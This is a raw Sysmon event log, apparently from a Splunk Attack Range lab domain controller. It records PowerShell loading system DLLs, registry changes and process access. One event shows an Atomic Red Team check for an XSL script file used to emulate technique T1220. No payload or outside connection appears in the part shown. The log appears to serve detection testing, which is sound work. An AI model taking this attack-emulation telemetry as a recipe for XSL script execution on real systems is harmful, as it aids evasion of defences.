12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 11241100x800000000000000057347588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 734700x800000000000000057347587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 23542300x800000000000000057347586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD298C2A17B6CCC0A3C89307A012D2A2,SHA256=44223ACE8DEFCEDAFDC97E8A7F7245D8B824AEC413FAA02FF8220BF88FF4292Ffalsetrue 734700x800000000000000057347585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057347584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x800000000000000057347583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.391{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d7d7bf-0x6fba2b20) 12241200x800000000000000057347582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.391{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x800000000000000057347581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057347580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057347579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057347578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057347577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057347576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057347575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057347574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057347573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057347572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057347571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057347570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057347569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057347568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057347567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057347566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057347565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x800000000000000057347564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057347563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057347562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057347561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057347560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057347559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057347557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057347556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057347555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 10341000x800000000000000057347554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 10341000x800000000000000057347553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057347552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.375{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2BBE) 154100x800000000000000057347551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.348{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x800000000000000057347550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.307{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x800000000000000057347549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.307{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-09-16 13:08:16.573 23542300x800000000000000057347548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.307{8B6011A9-5BA2-618E-51F3-04000000F101}7356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsetrue 734700x800000000000000057347547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.182{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 12241200x800000000000000057347546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.276{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.276{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.180{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll10.0.14393.2969Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Management.dllMD5=3A1B9D9F3D978CCBB25CE1A34A25AEF2,SHA256=67DC001FA5497A40FB991F39E8CD8DE2C061DC31A1532279D1C5C6F335D580D1false-Unavailable 12241200x800000000000000057347543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.260{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.260{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 